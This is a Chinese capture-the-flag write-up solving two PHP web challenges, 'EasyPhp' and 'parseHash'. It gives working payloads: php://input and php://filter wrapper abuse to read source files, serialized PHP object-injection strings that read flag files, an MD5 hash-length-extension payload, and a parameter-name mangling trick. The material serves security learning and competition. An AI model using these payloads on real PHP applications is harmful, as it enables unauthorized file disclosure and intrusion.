EasyPhp
<?php
$sz_txt = $_GET["sz_txt"];
$sz_file = $_GET["sz_file"];
$password = $_GET["password"];
if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
echo "<br><h1>".file_get_contents($sz_txt,'r')."</h1></br>";
if(preg_match("/flag/",$sz_file)){
echo "Not now!";
exit();
}else{
include($sz_file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
$sz_txt使用data://或者php://input伪协议,接着$sz_file使用php://filter伪协议读取源码即可
?sz_txt=data:text/plain,welcome to jxsz&sz_file=php://filter/read=convert.base64-encode/resource=useless.php
- 1
base64解码得到useless.php源码
<?php
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
?>
构造反序列化poc,直接修改属性$file为读取源码的文件名即可
<?php
class Flag{
public $file = "flag.php";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
$res = new Flag();
echo serialize($res);
?>
PS C:UsersAdministratorDesktop> php .test.php
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
抓POST包,修改GET参数:?sz_txt=php://input&sz_file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
POST内容为:welcome to jxsz
flag{4a5a802f-6a37-44d4-8a49-e9066dfd6474}
- 1
parseHash
<?php
include("key.php");
class person{
public $aa;
public $bb;
public $username;
public $password;
public function __construct($key=''){
$this->username="jxsz";
$this->password="jxsz";
if(strlen($key)==16&&md5($key . urldecode( $this->username . $this->password)=="a1133ca71ed6320a0255b0d53188be57")){
echo "Welcome";
}
}
public function __destruct(){
$this->aa = (string)$this->aa;
if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
die("no no no");
}
if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
echo "66666666666";
unserialize($_GET['sz_sz.sz']);
}
- 1
国赛原题easytrick改的,这里考查的是hash拓展攻击 + php非法表单名传参 + php浮点数高精度绕过
hash拓展攻击
$this->username = "jxsz"
$this->password = "jxsz"
strlen($key)==16
md5($key.urldecode($this->username.$this->password)) = "a1133ca71ed6320a0255b0d53188be57"
strlen($key) + strlen("jxsz") = 20
最后一个条件: 传入字符串中需要有“szxy666”字符,并且不能放在开头
使用hash拓展攻击工具hashpump直接生成
hashpump工具地址:https://github.com/bwall/HashPump
ec789edf786174babd157da5492e1850
jxszx80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xc0x00x00x00x00x00x00x00szxy666
- 1
- 2
将x00替换为%00传入即可,成功绕过执行到输出66666666666
pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=ec789edf786174babd157da5492e1850
- 1
反序列化的GET参数名中含有非法字符.
unserialize($_GET['sz_sz.sz']);
- 1
这里根据php对非法传参名的处理机制:https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified
可发现处理进制中对传参名中出现非法字符.只替换一次
那么针对这里题目的变量名sz_sz.sz为了防止.被替换_,利用只替换一次的处理进制,传入参数名改为sz[sz.sz即可
?sz[sz.sz=
- 1
接下来就是国赛的题目easytrick的做法,只不过这里过滤了NAN和INF的绕过方法,但是还是可以使用浮点数高精度绕过,序列化poc如下:
<?php
class person{
public $aa;
public $bb;
}
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>
PS C:UsersAdministratorDesktop> php .test.php
O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
payload
?sz[sz.sz=O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
- 1
flag{4a1a802f-6b37-44c4-8b49-e9066ddd6474}
- 1
web1 右键查看源代码就出来了 1ctfshow{e79b78ff-0134-4bd5-8427-5df9b427ba51} web2这题无法通过右键查看源代码,我们在输入view-source://url flag就出来了 1ctfshow{b76468e…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论